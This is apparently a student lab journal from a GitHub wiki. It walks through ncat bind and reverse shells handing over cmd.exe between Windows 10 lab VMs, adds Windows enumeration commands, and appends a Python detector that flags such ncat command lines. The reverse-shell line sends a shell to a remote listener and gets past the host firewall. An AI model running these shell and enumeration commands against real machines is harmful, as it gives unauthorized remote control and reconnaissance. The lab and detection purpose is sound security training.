Popping Shells - tmansfield42/Tech-Journal GitHub Wiki
Summary: Disabled the Windows 10 firewall and used ncat to run cmd.exe behind a listener on one PC, so anyone who connects to it gets a command prompt. Next, with the victim's firewall turned back on, ran ncat on the victim's PC so it connected out to the other PC and handed over cmd.exe.
Part 1:
Preparation:
Two people: 1 & 2
Each person must change the Network Adapter on their Windows 10 Virtual Machine to “NETSEC-WAN”
You may have to run: ipconfig /release and then ipconfig /renew
You should have an IP address in the 10.0.16.XXX range
Download nmap on your Windows 10 Virtual Machine: https://nmap.org/dist/nmap-7.93-setup.exe
Steps:
Person 1: ncat -l 8001 -e cmd.exe -v
"uses ncat to listen on port 8001 and execute cmd.exe for whoever connects; -v means verbose and shows more information than it normally would"
Person 2: ncat X.X.X.X 8001
"initiates a connection on port 8001 to the IP address of the computer the listener was set up on"
Part 2:
Preparation:
Person 1, change your Windows 10 Network Adapter and set it back to your LAN segment.
Person 1, enable your Windows 10 firewall.
Person 2, keep your Windows 10 Network Adapter on the NETSEC-WAN segment.
Steps:
Person 2: ncat -l 8080 -vv
Person 1: ncat -vv X.X.X.X 8080 -e cmd.exe
Person 2 should now have control over Person 1's computer, even with Person 1's firewall on, because the connection was made outbound from Person 1's PC to Person 2's listener.
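As an added example (not part of the original journal), a defender-side check for the two patterns above: it parses ncat command lines the way a process-creation log would record them, labels the Part 1 listener a bind shell and the Part 2 outbound connection a reverse shell, and flags which of the two the host firewall's default inbound rules actually stop. The command lines and the peer address 10.0.16.25 are constructed.

```python
import shlex
from dataclasses import dataclass
# Constructed process-creation records (Sysmon Event ID 1 style CommandLine field),
# not real telemetry: the two ncat commands from Parts 1 and 2 plus two non-findings.
EVENTS = [
    "ncat -l 8001 -e cmd.exe -v",           # Part 1, Person 1
    "ncat -vv 10.0.16.25 8080 -e cmd.exe",  # Part 2, Person 1 (10.0.16.25 is a made-up peer)
    "ncat -l 8080 -vv",                     # Part 2, Person 2: plain listener, no shell
    '"C:\\Windows\\System32\\cmd.exe" /c ipconfig /renew',
]
NC_NAMES = {"ncat", "ncat.exe", "nc", "nc.exe"}
SHELLS = {"cmd.exe", "cmd", "powershell.exe", "powershell", "pwsh.exe"}
EXEC_OPTS = {"-e", "--exec", "-c", "--sh-exec"}
@dataclass
class Finding:
    kind: str    # "bind_shell": the listener runs the shell; "reverse_shell": the connector does
    port: int    # listening port (bind) or remote port (reverse); None if absent
    remote: str  # remote host for a reverse shell, else None
    def stopped_by_inbound_firewall(self):
        """Only the bind shell needs an inbound connection, which the host firewall blocks."""
        return self.kind == "bind_shell"
def _base(path):  # file name of a quoted Windows or POSIX path, lower-cased
    return path.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
def _port(s):
    return int(s) if s and s.isdigit() else None
def classify_ncat(cmdline):
    """Return a Finding if cmdline is ncat handing a shell to its peer, else None."""
    args = shlex.split(cmdline, posix=False)
    if not args or _base(args[0]) not in NC_NAMES:
        return None
    listen, exec_target, positional, i = False, None, [], 1
    while i < len(args):
        a = args[i]
        if a in ("-l", "--listen"):
            listen = True
        elif a in EXEC_OPTS and i + 1 < len(args):
            i, exec_target = i + 1, args[i + 1]
        elif not a.startswith("-"):
            positional.append(a)  # [port] when listening, [host, port] when connecting
        i += 1
    if exec_target is None or _base(exec_target) not in SHELLS:
        return None
    if listen:  # Part 1 pattern: whoever connects in gets cmd.exe
        return Finding("bind_shell", _port(positional[0] if positional else None), None)
    # Part 2 pattern: this host connects out and hands cmd.exe to the remote listener
    return Finding("reverse_shell", _port(positional[1] if len(positional) > 1 else None),
                   positional[0] if positional else None)
def scan(command_lines):
    return [f for f in map(classify_ncat, command_lines) if f]
```

Running scan(EVENTS) yields one bind shell on 8001 and one reverse shell to 10.0.16.25:8080; only the first is stopped by default inbound filtering, so catching the second needs process or outbound-connection monitoring rather than the firewall alone.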
Now we can run other commands to enumerate a remote computer.
net users - get the list of local users
net view - enumerate other hosts
net users /domain - enumerate other users on the domain
tasklist - list of running processes
tasklist /svc - list of services
wmic os - OS details
wmic useraccount - user account details
systeminfo - detailed host information